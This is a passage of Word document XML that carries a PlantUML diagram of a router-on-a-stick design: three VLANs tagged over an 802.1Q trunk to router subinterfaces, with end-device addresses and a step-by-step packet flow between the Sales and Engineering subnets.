            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "VLAN 30\nManagement\n192.168.30.0/24" as vlan30 #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="429EEEE6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="663FC0F3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Trunk Port\nGi0/1" as trunk_port #lightblue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36DA217D" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="694391DF" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60401391" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Layer 3 Router" as router {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="153B8FAC" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Subinterface Gi0/0.10\n192.168.10.1/24" as sub10 #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="290385D7" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Subinterface Gi0/0.20\n192.168.20.1/24" as sub20 #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0732401B" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Subinterface Gi0/0.30\n192.168.30.1/24" as sub30 #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DD20BB9" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E188FB9" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Routing Table" as routing_table #lightcyan {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F4E8C0A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "192.168.10.0/24 → Gi0/0.10" as route10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="435F41C3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "192.168.20.0/24 → Gi0/0.20" as route20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="386A9F6C" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "192.168.30.0/24 → Gi0/0.30" as route30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D72B3F2" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="646E3037" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="723C9DFF" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Physical Interface\nGi0/0" as physical_int #lightblue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A862EAF" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28B9AA8B" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75D06E75" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "End Devices" as devices {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582A8825" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Sales PC\n192.168.10.10\nGW: 192.168.10.1" as sales_pc #lightgreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B5E734" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Engineering WS\n192.168.20.10\nGW: 192.168.20.1" as eng_ws #lightyellow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4773A815" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Management Laptop\n192.168.30.10\nGW: 192.168.30.1" as mgmt_laptop #lightpink</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B040093" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2396E42A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EBBF426" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>package "Communication Flow" as flow {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B924E4A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Step 1: Sales PC → Engineering WS" as step1 #lightcoral</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76D249B7" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Step 2: Packet to Gateway 192.168.10.1" as step2 #lightcoral</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C62F3B4" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Step 3: Router Lookup 192.168.20.10" as step3 #lightcoral</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2C34E7" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Step 4: Forward to Gi0/0.20" as step4 #lightcoral</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F66D23" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Step 5: Deliver to Engineering WS" as step5 #lightcoral</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DC5D539" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1991A8B4" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0401AF53" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan10 --&gt; trunk_port : Tagged VLAN 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FAFC3E4" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan20 --&gt; trunk_port : Tagged VLAN 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24FAD945" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan30 --&gt; trunk_port : Tagged VLAN 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466E04EE" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05C008A3" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>trunk_port --&gt; physical_int : 802.1Q Trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33181774" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E48867F" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>physical_int --&gt; sub10 : VLAN 10 Traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F5C894E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>physical_int --&gt; sub20 : VLAN 20 Traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C0C6701" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>physical_int --&gt; sub30 : VLAN 30 Traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D859F9" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6100594E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>sub10 --&gt; routing_table : Routing Lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656EF9D9" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>sub20 --&gt; routing_table : Routing Lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D73E4FA" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>sub30 --&gt; routing_table : Routing Lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12244149" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13E947BE" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan10 --&gt; sales_pc : Access Port</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7771FCAB" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan20 --&gt; eng_ws : Access Port</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AF7123F" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>vlan30 --&gt; mgmt_laptop : Access Port</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2383EAE8" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16D78F0A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>sales_pc --&gt; step1 : Initiates Communication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6697346B" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
